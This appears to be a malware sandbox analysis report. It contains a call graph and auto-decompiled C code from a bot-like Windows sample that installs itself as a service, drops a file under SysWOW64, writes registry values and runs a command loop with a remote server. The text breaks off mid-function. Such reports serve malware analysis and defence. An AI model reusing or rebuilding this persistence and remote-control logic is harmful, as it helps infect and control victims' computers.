7958 12b42b 7956->7958 7959 12ef7c 3 API calls 7957->7959 7960 12ef7c 3 API calls 7958->7960 7961 12b480 7959->7961 7960->7962 7963 12ef7c 3 API calls 7961->7963 7962->7955 7964 12b493 7963->7964 7965 12ef7c 3 API calls 7964->7965 7966 12b4bb 7965->7966 8023 12ad89 GetLocalTime SystemTimeToFileTime 7966->8023 7970 12b4cc 7971 12ef7c 3 API calls 7970->7971 7972 12b4dd 7971->7972 7973 12b211 7 API calls 7972->7973 7974 12b4ec 7973->7974 7975 12ef7c 3 API calls 7974->7975 7976 12b4fd 7975->7976 7977 12b211 7 API calls 7976->7977 7978 12b509 7977->7978 7979 12ef7c 3 API calls 7978->7979 7980 12b51a 7979->7980 7980->7840 7982 
12abe9 GetTickCount 7981->7982 7984 12ab8c 7981->7984 7986 12a51d 7982->7986 7983 12aba8 lstrcpynA 7983->7984 7984->7982 7984->7983 7985 12abe1 InterlockedIncrement 7984->7985 7985->7984 7987 12a4c7 4 API calls 7986->7987 7988 12a52c 7987->7988 7989 12a542 GetTickCount 7988->7989 7991 12a539 GetTickCount 7988->7991 7989->7991 7992 12a56c 7991->7992 7992->7840 7994 12a4c7 4 API calls 7993->7994 7995 12a633 7994->7995 7995->7840 7997 12f04e 4 API calls 7996->7997 7999 12372a 7997->7999 7998 123847 7998->7896 7998->7898 7999->7998 8000 1237b3 GetCurrentThreadId 7999->8000 8000->7999 8001 1237c8 GetCurrentThreadId 8000->8001 8001->7999 8003 12f04e 4 API calls 8002->8003 8004 12360c 8003->8004 8005 1236da GetCurrentThreadId 8004->8005 8006 1236f1 8004->8006 8005->8006 8007 1236e5 GetCurrentThreadId 8005->8007 8006->7897 8006->7898 8007->8006 8009 122d21 7 API calls 8008->8009 8010 122f3d 8009->8010 8012 122f85 8010->8012 8013 122f4f 8010->8013 8015 122f44 8010->8015 8011 122fcf GetProcessHeap HeapFree 8011->8015 8012->8011 8012->8012 8014 122f6b GetProcessHeap HeapFree 8013->8014 8014->8015 8015->7917 8017 123900 8016->8017 8018 123980 8016->8018 8019 1230fa 4 API calls 8017->8019 8018->7925 8022 12390a 8019->8022 8020 12391b GetCurrentThreadId 8020->8022 8021 123939 GetCurrentThreadId 8021->8022 8022->8018 8022->8020 8022->8021 8024 12adbf 8023->8024 8048 12ad08 gethostname 8024->8048 8027 1230b5 2 API calls 8028 12add3 8027->8028 8029 12a7a3 inet_ntoa 8028->8029 8031 12ade4 8028->8031 8029->8031 8030 12ae85 wsprintfA 8032 12ef7c 3 API calls 8030->8032 8031->8030 8033 12ae36 wsprintfA wsprintfA 8031->8033 8034 12aebb 8032->8034 8035 12ef7c 3 API calls 8033->8035 8036 12ef7c 3 API calls 8034->8036 8035->8031 8037 12aed2 8036->8037 8038 12b211 8037->8038 8039 12b2bb FileTimeToLocalFileTime FileTimeToSystemTime 8038->8039 8040 12b2af GetLocalTime 8038->8040 8041 12b2d2 8039->8041 8040->8041 8042 12b2d9 SystemTimeToFileTime 8041->8042 8043 12b31c GetTimeZoneInformation 
8041->8043 8044 12b2ec 8042->8044 8045 12b33a wsprintfA 8043->8045 8046 12b312 FileTimeToSystemTime 8044->8046 8045->7970 8046->8043 8049 12ad71 8048->8049 8054 12ad26 lstrlenA 8048->8054 8051 12ad85 8049->8051 8052 12ad79 lstrcpyA 8049->8052 8051->8027 8052->8051 8053 12ad68 lstrlenA 8053->8049 8054->8049 8054->8053 8207 124960 8208 12496d 8207->8208 8210 12497d 8207->8210 8209 12ebed 8 API calls 8208->8209 8209->8210 8055 125e21 8056 125e36 8055->8056 8057 125e29 8055->8057 8058 1250dc 17 API calls 8057->8058 8058->8056 8211 124861 IsBadWritePtr 8212 124876 8211->8212 8213 129961 RegisterServiceCtrlHandlerA 8214 12997d 8213->8214 8221 1299cb 8213->8221 8223 129892 8214->8223 8216 12999a 8217 1299ba 8216->8217 8218 129892 SetServiceStatus 8216->8218 8219 129892 SetServiceStatus 8217->8219 8217->8221 8220 1299aa 8218->8220 8219->8221 8220->8217 8222 1298f2 41 API calls 8220->8222 8222->8217 8224 1298c2 SetServiceStatus 8223->8224 8224->8216 8059 1235a5 8060 1230fa 4 API calls 8059->8060 8061 1235b3 8060->8061 8065 1235ea 8061->8065 8066 12355d 8061->8066 8063 1235da 8064 12355d 4 API calls 8063->8064 8063->8065 8064->8065 8067 12f04e 4 API calls 8066->8067 8068 12356a 8067->8068 8068->8063 6125 129a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 6241 12ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 6125->6241 6127 129a95 6128 129aa3 GetModuleHandleA GetModuleFileNameA 6127->6128 6133 12a3cc 6127->6133 6142 129ac4 6128->6142 6129 12a41c CreateThread WSAStartup 6242 12e52e 6129->6242 7317 12405e CreateEventA 6129->7317 6131 129afd GetCommandLineA 6140 129b22 6131->6140 6132 12a406 DeleteFileA 6132->6133 6134 12a40d 6132->6134 6133->6129 6133->6132 6133->6134 6137 12a3ed GetLastError 6133->6137 6134->6129 6135 12a445 6261 12eaaf 6135->6261 6137->6134 6139 12a3f8 Sleep 6137->6139 6138 12a44d 6265 121d96 6138->6265 6139->6132 6145 129c0c 6140->6145 6151 129b47 6140->6151 6142->6131 6143 12a457 6313 1280c9 6143->6313 6505 1296aa 6145->6505 6156 
129b96 lstrlenA 6151->6156 6161 129b58 6151->6161 6152 12a1d2 6162 12a1e3 GetCommandLineA 6152->6162 6153 129c39 6157 12a167 GetModuleHandleA GetModuleFileNameA 6153->6157 6511 124280 CreateEventA 6153->6511 6156->6161 6159 129c05 ExitProcess 6157->6159 6160 12a189 6157->6160 6160->6159 6169 12a1b2 GetDriveTypeA 6160->6169 6161->6159 6464 12675c 6161->6464 6171 12a205 6162->6171 6169->6159 6173 12a1c5 6169->6173 6191 12a285 lstrlenA 6171->6191 6202 12a239 6171->6202 6172 12a491 6177 12a49f GetTickCount 6172->6177 6180 12a4be Sleep 6172->6180 6187 12a4b7 GetTickCount 6172->6187 6360 12c913 6172->6360 6612 129145 GetModuleHandleA GetModuleFileNameA CharToOemA 6173->6612 6174 12675c 21 API calls 6178 129c79 6174->6178 6177->6172 6177->6180 6178->6157 6182 129ca0 GetTempPathA 6178->6182 6183 129e3e 6178->6183 6179 129bff 6179->6159 6180->6172 6182->6183 6184 129cba 6182->6184 6190 129e6b GetEnvironmentVariableA 6183->6190 6192 129e04 6183->6192 6537 1299d2 lstrcpyA 6184->6537 6187->6180 6190->6192 6193 129e7d 6190->6193 6191->6202 6607 12ec2e 6192->6607 6194 1299d2 16 API calls 6193->6194 6196 129e9d 6194->6196 6196->6192 6200 129eb0 lstrcpyA lstrlenA 6196->6200 6197 129d5f 6551 126cc9 6197->6551 6199 12a3c2 6624 1298f2 6199->6624 6201 129ef4 6200->6201 6205 126dc2 6 API calls 6201->6205 6209 129f03 6201->6209 6202->6202 6620 126ec3 6202->6620 6205->6209 6206 12a39d StartServiceCtrlDispatcherA 6206->6199 6207 129d72 lstrcpyA lstrcatA lstrcatA 6210 129cf6 6207->6210 6208 12a3c7 6208->6133 6211 129f32 RegOpenKeyExA 6209->6211 6560 129326 6210->6560 6213 129f48 RegSetValueExA RegCloseKey 6211->6213 6216 129f70 6211->6216 6212 12a35f 6212->6199 6212->6206 6213->6216 6221 129f9d GetModuleHandleA GetModuleFileNameA 6216->6221 6217 129e0c DeleteFileA 6217->6183 6218 129dde GetFileAttributesExA 6218->6217 6220 129df7 6218->6220 6220->6192 6597 1296ff 6220->6597 6223 129fc2 6221->6223 6224 12a093 6221->6224 6223->6224 6230 129ff1 GetDriveTypeA 6223->6230 6225 12a103 
CreateProcessA 6224->6225 6226 12a0a4 wsprintfA 6224->6226 6227 12a13a 6225->6227 6228 12a12a DeleteFileA 6225->6228 6603 122544 6226->6603 6227->6192 6234 1296ff 3 API calls 6227->6234 6228->6227 6230->6224 6232 12a00d 6230->6232 6236 12a02d lstrcatA 6232->6236 6234->6192 6237 12a046 6236->6237 6238 12a052 lstrcatA 6237->6238 6239 12a064 lstrcatA 6237->6239 6238->6239 6239->6224 6240 12a081 lstrcatA 6239->6240 6240->6224 6241->6127 6631 12dd05 GetTickCount 6242->6631 6244 12e538 6639 12dbcf 6244->6639 6246 12e544 6247 12e555 GetFileSize 6246->6247 6252 12e5b8 6246->6252 6248 12e5b1 CloseHandle 6247->6248 6249 12e566 6247->6249 6248->6252 6663 12db2e 6249->6663 6649 12e3ca RegOpenKeyExA 6252->6649 6253 12e576 ReadFile 6253->6248 6254 12e58d 6253->6254 6667 12e332 6254->6667 6257 12e5f2 6259 12e3ca 19 API calls 6257->6259 6260 12e629 6257->6260 6259->6260 6260->6135 6262 12eabe 6261->6262 6264 12eaba 6261->6264 6263 12dd05 6 API calls 6262->6263 6262->6264 6263->6264 6264->6138 6266 12ee2a 6265->6266 6267 121db4 GetVersionExA 6266->6267 6268 121dd0 GetSystemInfo GetModuleHandleA GetProcAddress 6267->6268 6270 121e16 GetCurrentProcess 6268->6270 6271 121e24 6268->6271 6270->6271 6725 12e819 6271->6725 6273 121e3d 6274 12e819 11 API calls 6273->6274 6275 121e4e 6274->6275 6276 121e77 6275->6276 6766 12df70 6275->6766 6732 12ea84 6276->6732 6280 121e6c 6282 12df70 12 API calls 6280->6282 6281 12e819 11 API calls 6283 121e93 6281->6283 6282->6276 6736 12199c inet_addr LoadLibraryA 6283->6736 6286 12e819 11 API calls 6287 121eb9 6286->6287 6288 121ed8 6287->6288 6290 12f04e 4 API calls 6287->6290 6289 12e819 11 API calls 6288->6289 6291 121eee 6289->6291 6292 121ec9 6290->6292 6293 121f0a 6291->6293 6750 121b71 6291->6750 6294 12ea84 30 API calls 6292->6294 6296 12e819 11 API calls 6293->6296 6294->6288 6298 121f23 6296->6298 6297 121efd 6299 12ea84 30 API calls 6297->6299 6300 121f3f 6298->6300 6754 121bdf 6298->6754 6299->6293 6301 12e819 11 API calls 6300->6301 6303 
121f5e 6301->6303 6305 121f77 6303->6305 6307 12ea84 30 API calls 6303->6307 6762 1230b5 6305->6762 6306 12ea84 30 API calls 6306->6300 6307->6305 6310 121f8e GetTickCount 6310->6143 6312 126ec3 2 API calls 6312->6310 6314 126ec3 2 API calls 6313->6314 6315 1280eb 6314->6315 6316 1280f9 6315->6316 6317 1280ef 6315->6317 6833 12704c 6316->6833 6820 127ee6 6317->6820 6320 128269 CreateThread 6339 125e6c 6320->6339 7295 12877e 6320->7295 6321 1280f4 6321->6320 6323 12675c 21 API calls 6321->6323 6322 128110 6322->6321 6324 128156 RegOpenKeyExA 6322->6324 6329 128244 6323->6329 6325 128216 6324->6325 6326 12816d RegQueryValueExA 6324->6326 6325->6321 6327 1281f7 6326->6327 6328 12818d 6326->6328 6330 12820d RegCloseKey 6327->6330 6332 12ec2e codecvt 4 API calls 6327->6332 6328->6327 6333 12ebcc 4 API calls 6328->6333 6329->6320 6331 12ec2e codecvt 4 API calls 6329->6331 6330->6325 6331->6320 6338 1281dd 6332->6338 6334 1281a0 6333->6334 6334->6330 6335 1281aa RegQueryValueExA 6334->6335 6335->6327 6336 1281c4 6335->6336 6337 12ebcc 4 API calls 6336->6337 6337->6338 6338->6330 6935 12ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 6339->6935 6341 125e71 6936 12e654 6341->6936 6343 125ec1 6344 123132 6343->6344 6345 12df70 12 API calls 6344->6345 6346 12313b 6345->6346 6347 12c125 6346->6347 6947 12ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 6347->6947 6349 12c12d 6350 12e654 13 API calls 6349->6350 6351 12c2bd 6350->6351 6352 12e654 13 API calls 6351->6352 6353 12c2c9 6352->6353 6354 12e654 13 API calls 6353->6354 6355 12a47a 6354->6355 6356 128db1 6355->6356 6357 128dbc 6356->6357 6358 12e654 13 API calls 6357->6358 6359 128dec Sleep 6358->6359 6359->6172 6361 12c92f 6360->6361 6362 12c93c 6361->6362 6959 12c517 6361->6959 6364 12e819 11 API calls 6362->6364 6379 12ca2b 6362->6379 6365 12c96a 6364->6365 6366 12e819 11 API calls 6365->6366 6367 12c97d 6366->6367 6368 12e819 11 API calls 6367->6368 6369 12c990 6368->6369 6370 12ebcc 4 
API calls 6369->6370 6371 12c9aa 6369->6371 6370->6371 6371->6379 6948 122684 6371->6948 6376 12ca26 6976 12c8aa 6376->6976 6379->6172 6380 12ca44 6381 12ca4b closesocket 6380->6381 6382 12ca83 6380->6382 6381->6376 6383 12ea84 30 API calls 6382->6383 6384 12caac 6383->6384 6385 12f04e 4 API calls 6384->6385 6386 12cab2 6385->6386 6387 12ea84 30 API calls 6386->6387 6388 12caca 6387->6388 6389 12ea84 30 API calls 6388->6389 6390 12cad9 6389->6390 6980 12c65c 6390->6980 6393 12cb60 closesocket 6393->6379 6395 12dad2 closesocket 6396 12e318 23 API calls 6395->6396 6397 12dae0 6396->6397 6397->6379 6398 12df4c 20 API calls 6457 12cb70 6398->6457 6404 12e654 13 API calls 6404->6457 6407 12f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 6407->6457 6410 12c65c send GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 6410->6457 6411 12ea84 30 API calls 6411->6457 6412 12d569 closesocket Sleep 7027 12e318 6412->7027 6413 12d815 wsprintfA 6413->6457 6414 12cc1c GetTempPathA 6414->6457 6415 12c517 23 API calls 6415->6457 6417 127ead 6 API calls 6417->6457 6418 12e8a1 30 API calls 6418->6457 6419 12d582 ExitProcess 6420 12cfe3 GetSystemDirectoryA 6420->6457 6421 12cfad GetEnvironmentVariableA 6421->6457 6422 12675c 21 API calls 6422->6457 6423 12d027 GetSystemDirectoryA 6423->6457 6424 12d105 lstrcatA 6424->6457 6425 12ef1e lstrlenA 6425->6457 6426 12cc9f CreateFileA 6428 12ccc6 WriteFile 6426->6428 6426->6457 6427 12ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 6427->6457 6431 12cdcc CloseHandle 6428->6431 6432 12cced CloseHandle 6428->6432 6429 128e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 6429->6457 6430 12d15b CreateFileA 6433 12d182 WriteFile CloseHandle 6430->6433 6430->6457 6431->6457 6438 12cd2f 6432->6438 6433->6457 6434 12cd16 wsprintfA 6434->6438 6435 12d149 SetFileAttributesA 6435->6430 6436 12d36e GetEnvironmentVariableA 6436->6457 6437 12d1bf SetFileAttributesA 6437->6457 
                                                                                C-Code - Quality: 88%
                                                                                			E0012C913() {
                                                                                				CHAR* _v8;
                                                                                				CHAR* _v12;
                                                                                				intOrPtr _v16;
                                                                                				signed int _v17;
                                                                                				signed int _v24;
                                                                                				signed int _v35;
                                                                                				CHAR* _v39;
                                                                                				signed int _v52;
                                                                                				long _v56;
                                                                                				CHAR* _v60;
                                                                                				CHAR* _v64;
                                                                                				CHAR* _v68;
                                                                                				signed int _v72;
                                                                                				signed int _v76;
                                                                                				char _v92;
                                                                                				char _v96;
                                                                                				long _v100;
                                                                                				intOrPtr _v104;
                                                                                				struct _PROCESS_INFORMATION _v120;
                                                                                				char _v408;
                                                                                				struct _PROCESS_INFORMATION _v424;
                                                                                				char _v440;
                                                                                				intOrPtr _v492;
                                                                                				intOrPtr _v496;
                                                                                				intOrPtr _v500;
                                                                                				intOrPtr _v508;
                                                                                				intOrPtr _v512;
                                                                                				char _v640;
                                                                                				intOrPtr _v688;
                                                                                				intOrPtr _v720;
                                                                                				intOrPtr _v728;
                                                                                				intOrPtr _v732;
                                                                                				CHAR* _v736;
                                                                                				char _v740;
                                                                                				struct _STARTUPINFOA _v808;
                                                                                				struct _STARTUPINFOA _v876;
                                                                                				char _v1176;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t362;
                                                                                				intOrPtr _t368;
                                                                                				void* _t369;
                                                                                				signed int _t388;
                                                                                				signed int _t392;
                                                                                				signed int _t395;
                                                                                				signed int _t398;
                                                                                				CHAR* _t403;
                                                                                				signed int _t408;
                                                                                				signed int _t409;
                                                                                				signed int _t410;
                                                                                				signed int _t413;
                                                                                				signed int _t416;
                                                                                				void* _t417;
                                                                                				CHAR* _t418;
                                                                                				signed int _t421;
                                                                                				CHAR* _t428;
                                                                                				signed int _t429;
                                                                                				signed int _t434;
                                                                                				signed int _t438;
                                                                                				signed int _t439;
                                                                                				signed int _t441;
                                                                                				CHAR* _t444;
                                                                                				signed int _t449;
                                                                                				signed int _t453;
                                                                                				signed int _t456;
                                                                                				signed int _t459;
                                                                                				signed int _t462;
                                                                                				signed int _t463;
                                                                                				signed int _t467;
                                                                                				signed int _t472;
                                                                                				signed int _t473;
                                                                                				signed int _t476;
                                                                                				signed int _t478;
                                                                                				signed int _t479;
                                                                                				CHAR* _t480;
                                                                                				CHAR* _t483;
                                                                                				signed int _t485;
                                                                                				signed int _t488;
                                                                                				signed int _t489;
                                                                                				CHAR* _t492;
                                                                                				long _t494;
                                                                                				signed int _t499;
                                                                                				signed int _t500;
                                                                                				signed int _t501;
                                                                                				signed char* _t502;
                                                                                				intOrPtr* _t513;
                                                                                				signed int _t514;
                                                                                				signed int _t527;
                                                                                				signed int _t541;
                                                                                				signed int _t545;
                                                                                				signed int _t552;
                                                                                				intOrPtr* _t559;
                                                                                				signed int _t560;
                                                                                				signed int _t571;
                                                                                				signed int _t575;
                                                                                				signed int _t579;
                                                                                				signed int _t583;
                                                                                				signed int _t588;
                                                                                				signed char _t590;
                                                                                				signed int _t591;
                                                                                				intOrPtr* _t595;
                                                                                				signed int _t596;
                                                                                				signed int _t599;
                                                                                				void* _t602;
                                                                                				intOrPtr* _t607;
                                                                                				signed char* _t609;
                                                                                				CHAR* _t613;
                                                                                				intOrPtr _t615;
                                                                                				signed int _t616;
                                                                                				signed int _t617;
                                                                                				signed int _t618;
                                                                                				signed int _t621;
                                                                                				signed int _t624;
                                                                                				CHAR* _t630;
                                                                                				void* _t632;
                                                                                				signed int _t634;
                                                                                				CHAR* _t635;
                                                                                				CHAR* _t636;
                                                                                				void* _t642;
                                                                                				signed int _t644;
                                                                                				void* _t651;
                                                                                				int _t657;
                                                                                				int _t673;
                                                                                				signed int _t681;
                                                                                				CHAR* _t686;
                                                                                				intOrPtr _t688;
                                                                                				void* _t695;
                                                                                				CHAR* _t701;
                                                                                				signed int _t705;
                                                                                				signed int _t709;
                                                                                				signed int _t711;
                                                                                				signed int _t712;
                                                                                				signed int _t723;
                                                                                				signed char* _t726;
                                                                                				char _t733;
                                                                                				char _t734;
                                                                                				char* _t736;
                                                                                				void* _t738;
                                                                                				signed int _t747;
                                                                                				signed int _t748;
                                                                                				signed int _t758;
                                                                                				signed int _t760;
                                                                                				void* _t763;
                                                                                				signed int _t764;
                                                                                				signed int _t765;
                                                                                				void* _t766;
                                                                                				void* _t768;
                                                                                				void* _t769;
                                                                                				long _t770;
                                                                                				void* _t773;
                                                                                				void* _t774;
                                                                                				void* _t775;
                                                                                				intOrPtr* _t776;
                                                                                				intOrPtr* _t777;
                                                                                				void* _t779;
                                                                                				void* _t781;
                                                                                				void* _t782;
                                                                                				signed int _t789;
                                                                                				signed int _t791;
                                                                                				signed int _t793;
                                                                                				signed int _t795;
                                                                                				CHAR* _t796;
                                                                                				signed char* _t797;
                                                                                				signed int* _t798;
                                                                                				signed int _t801;
                                                                                				long _t803;
                                                                                				signed int _t805;
                                                                                				void* _t806;
                                                                                				void* _t807;
                                                                                				void* _t808;
                                                                                				void* _t809;
                                                                                				void* _t811;
                                                                                				intOrPtr _t819;
                                                                                				signed int _t820;
                                                                                				intOrPtr _t821;
                                                                                				signed int _t822;
                                                                                				CHAR* _t823;
                                                                                
                                                                                				_v64 = 0;
                                                                                				_v68 = 0;
                                                                                				_t819 =  *0x13366c; // 0x132058
                                                                                				if(_t819 == 0) {
                                                                                					L2:
                                                                                					E0012C517();
                                                                                					L3:
                                                                                					_t821 =  *0x13366c; // 0x132058
                                                                                					if(_t821 == 0) {
                                                                                						L21:
                                                                                						__eflags = 0;
                                                                                						return 0;
                                                                                					}
                                                                                					_t822 =  *0x133670; // 0x2
                                                                                					if(_t822 == 0) {
                                                                                						goto L21;
                                                                                					}
                                                                                					 *0x132104 = E0012E819(1, "time_cfg", "wtm_c", 0x14);
                                                                                					 *0x13210c = E0012E819(1, "time_cfg", "wtm_w", 0x28);
                                                                                					_t362 = E0012E819(1, "time_cfg", "wtm_r", 0x28);
                                                                                					_t808 = _t807 + 0x30;
                                                                                					 *0x132108 = _t362;
                                                                                					_t823 =  *0x1336b0; // 0x3e00000
                                                                                					if(_t823 != 0) {
                                                                                						L7:
                                                                                						_t747 =  *0x133674; // 0x0
                                                                                						_t688 =  *0x13366c; // 0x132058
                                                                                						_v12 = 0;
                                                                                						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
                                                                                							L11:
                                                                                							_t748 = _t747 * 0x45;
                                                                                							_t365 = _t748 + _t688;
                                                                                							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
                                                                                							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
                                                                                								goto L21;
                                                                                							}
                                                                                							_t368 = E0012F428(E00122684(_t365 + 1), _t689);
                                                                                							_v16 = _t368;
                                                                                							_t829 = _t368;
                                                                                							if(_t368 > 0) {
                                                                                								_t369 = E0012F43E(_t368,  &_v640, 0xc8, 0); // executed
                                                                                								_t809 = _t808 + 0x10;
                                                                                								__eflags = _t369 - 0xc8;
                                                                                								if(__eflags == 0) {
                                                                                									E00128F53( &_v640, 0xc8);
                                                                                									__eflags = _v500 - 0xff;
                                                                                									_pop(_t695);
                                                                                									if(__eflags > 0) {
                                                                                										goto L15;
                                                                                									}
                                                                                									__eflags = _v512 - 7;
                                                                                									if(__eflags > 0) {
                                                                                										goto L15;
                                                                                									}
                                                                                									__eflags = _v508 - 7;
                                                                                									if(__eflags > 0) {
                                                                                										goto L15;
                                                                                									}
                                                                                									 *0x133684 = 1;
                                                                                									 *0x133678 = 0;
                                                                                									 *0x13367c = 0;
                                                                                									E0012EA84(1, "localcfg", "ip", _v496);
                                                                                									_v104 = E0012F04E(0);
                                                                                									_v100 = _t748;
                                                                                									E0012EA84(1, "localcfg", "srv_time", _v492);
                                                                                									E0012EA84(1, "localcfg", "local_time", _v104);
                                                                                									E00128FB6( &_v440,  &_v640);
                                                                                									E00128FB6( &_v92,  &_v640);
                                                                                									E0012EE2A(_t695,  &_v740, 0, 0x64);
                                                                                									_v728 = 1;
                                                                                									_v688 = 0x100007f;
                                                                                									_v732 = 1;
                                                                                									_v720 = 0x1f;
                                                                                									_v736 = 0;
                                                                                									_v39 = 0x37;
                                                                                									_t388 = E0012C65C(_v16,  &_v640,  &_v92, 0x132118, 0x64,  &_v52);
                                                                                									_t811 = _t809 + 0x68;
                                                                                									__eflags = _t388;
                                                                                									if(_t388 > 0) {
                                                                                										 *0x132148 = 0;
                                                                                										 *0x13215a = 0;
                                                                                										while(1) {
                                                                                											L24:
                                                                                											_t757 = _v16;
                                                                                											_t392 = E0012C75D(_v16,  &_v640,  &_v440,  *0x1336b0, 0x100000,  &_v52);
                                                                                											_t811 = _t811 + 0x18;
                                                                                											__eflags = _t392 - 0xfffffffe;
                                                                                											if(_t392 == 0xfffffffe) {
                                                                                												break;
                                                                                											}
                                                                                											__eflags = _t392;
                                                                                											if(_t392 < 0) {
                                                                                												continue;
                                                                                											}
                                                                                											_t395 = _v39;
                                                                                											__eflags = _t395;
                                                                                											if(_t395 == 0) {
                                                                                												_t789 = 1;
                                                                                												__eflags = 1;
                                                                                												do {
                                                                                													_t398 = 1 << _t789;
                                                                                													__eflags = _v35 & _t398;
                                                                                													if((_v35 & _t398) != 0) {
                                                                                														__eflags =  *(_t789 + 0x13215c);
                                                                                														if( *(_t789 + 0x13215c) == 0) {
                                                                                															__eflags = _t789 - 3;
                                                                                															if(_t789 != 3) {
                                                                                																E0012F1ED(_t789,  &_v96, 0xa);
                                                                                																E0012E654(E00128C51, 5,  &_v96);
                                                                                																_t811 = _t811 + 0x18;
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													_t789 = _t789 + 1;
                                                                                													__eflags = _t789 - 0x20;
                                                                                												} while (_t789 < 0x20);
                                                                                												continue;
                                                                                											}
                                                                                											__eflags = _t395 - 1;
                                                                                											if(_t395 == 1) {
                                                                                												_t403 =  *0x1336b0; // 0x3e00000
                                                                                												_t697 =  *_t403;
                                                                                												_v24 = _t697;
                                                                                												_t748 = _t403[4];
                                                                                												_v76 = _t748;
                                                                                												__eflags = _t697 & 0x00000018;
                                                                                												if((_t697 & 0x00000018) == 0) {
                                                                                													L177:
                                                                                													__eflags = _v24 & 0x00000001;
                                                                                													if((_v24 & 0x00000001) == 0) {
                                                                                														L179:
                                                                                														__eflags = _v24 & 0x00000004;
                                                                                														if((_v24 & 0x00000004) == 0) {
                                                                                															L182:
                                                                                															__eflags = _v24 & 0x00000040;
                                                                                															if((_v24 & 0x00000040) == 0) {
                                                                                																L186:
                                                                                																__eflags = _v24 & 0x00000080;
                                                                                																if((_v24 & 0x00000080) == 0) {
                                                                                																	L199:
                                                                                																	__eflags = _v24 & 0x00000100;
                                                                                																	if((_v24 & 0x00000100) == 0) {
                                                                                																		L204:
                                                                                																		__eflags = _v24 & 0x00000400;
                                                                                																		if((_v24 & 0x00000400) == 0) {
                                                                                																			L215:
                                                                                																			_v8 = 0;
                                                                                																			while(1) {
                                                                                																				__eflags = _v64;
                                                                                																				if(_v64 != 0) {
                                                                                																					goto L228;
                                                                                																				}
                                                                                																				_t758 = _v8[0x133300];
                                                                                																				__eflags = _t758;
                                                                                																				if(_t758 == 0) {
                                                                                																					L225:
                                                                                																					_v8 =  &(_v8[4]);
                                                                                																					__eflags = _v8 - 0x80;
                                                                                																					if(_v8 < 0x80) {
                                                                                																						continue;
                                                                                																					}
                                                                                																					__eflags = _v64;
                                                                                																					if(_v64 != 0) {
                                                                                																						goto L228;
                                                                                																					}
                                                                                																					_v39 = 0;
                                                                                																					_t408 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, 0,  &_v52);
                                                                                																					_t811 = _t811 + 0x18;
                                                                                																					__eflags = _t408;
                                                                                																					if(_t408 > 0) {
                                                                                																						goto L24;
                                                                                																					}
                                                                                																					goto L228;
                                                                                																				}
                                                                                																				_t409 =  *(_t758 + 0x4c);
                                                                                																				__eflags = _t409;
                                                                                																				if(_t409 == 0) {
                                                                                																					goto L225;
                                                                                																				}
                                                                                																				_t410 =  *_t409( &_v76,  &_v39,  *0x1336b0, 0x100000);
                                                                                																				while(1) {
                                                                                																					_t811 = _t811 + 0x10;
                                                                                																					_v52 = _t410;
                                                                                																					__eflags = _t410;
                                                                                																					if(_t410 <= 0) {
                                                                                																						break;
                                                                                																					}
                                                                                																					_t413 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, _t410,  &_v52);
                                                                                																					_t811 = _t811 + 0x18;
                                                                                																					__eflags = _t413;
                                                                                																					if(_t413 <= 0) {
                                                                                																						_v64 = 1;
                                                                                																						goto L225;
                                                                                																					}
                                                                                																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x1336b0, 0x100000);
                                                                                																				}
                                                                                																				goto L225;
                                                                                																			}
                                                                                																			break;
                                                                                																		}
                                                                                																		_t416 = E00127DD6(_t748);
                                                                                																		__eflags = _t416;
                                                                                																		if(_t416 != 0) {
                                                                                																			goto L215;
                                                                                																		}
                                                                                																		_t417 = E0012F04E(0);
                                                                                																		__eflags =  *0x1336ac - _t748; // 0x0
                                                                                																		if(__eflags > 0) {
                                                                                																			goto L215;
                                                                                																		}
                                                                                																		if(__eflags < 0) {
                                                                                																			L209:
                                                                                																			__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                																			if(__eflags == 0) {
                                                                                																				goto L215;
                                                                                																			}
                                                                                																			__eflags =  *0x1321a4; // 0x30800
                                                                                																			if(__eflags != 0) {
                                                                                																				L214:
                                                                                																				_t418 =  *0x1336b0; // 0x3e00000
                                                                                																				 *_t418 = 0;
                                                                                																				_t733 =  *0x1321a4; // 0x30800
                                                                                																				_t418[4] = _t733;
                                                                                																				_t734 =  *0x1322d4; // 0x348c26af
                                                                                																				_t418[8] = _t734;
                                                                                																				_v39 = 0x34;
                                                                                																				_t421 = E0012C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
                                                                                																				_t811 = _t811 + 0x18;
                                                                                																				__eflags = _t421;
                                                                                																				if(_t421 <= 0) {
                                                                                																					break;
                                                                                																				}
                                                                                																				goto L215;
                                                                                																			}
                                                                                																			_t791 = E0012675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v72, 0);
                                                                                																			_t811 = _t811 + 0xc;
                                                                                																			__eflags = _t791;
                                                                                																			if(_t791 != 0) {
                                                                                																				 *0x1322d4 = E001224C2(_t791, _v72, 0);
                                                                                																				 *0x1321a4 = _v72;
                                                                                																				E0012EC2E(_t791);
                                                                                																				_t811 = _t811 + 0x10;
                                                                                																			}
                                                                                																			__eflags =  *0x1321a4; // 0x30800
                                                                                																			if(__eflags == 0) {
                                                                                																				goto L215;
                                                                                																			} else {
                                                                                																				goto L214;
                                                                                																			}
                                                                                																		}
                                                                                																		__eflags =  *0x1336a8 - _t417; // 0x0
                                                                                																		if(__eflags > 0) {
                                                                                																			goto L215;
                                                                                																		}
                                                                                																		goto L209;
                                                                                																	}
                                                                                																	E0012E854(1, "localcfg", "except_info",  *0x1336b0, 0x100000, 0x130264);
                                                                                																	_t428 =  *0x1336b0; // 0x3e00000
                                                                                																	_t811 = _t811 + 0x18;
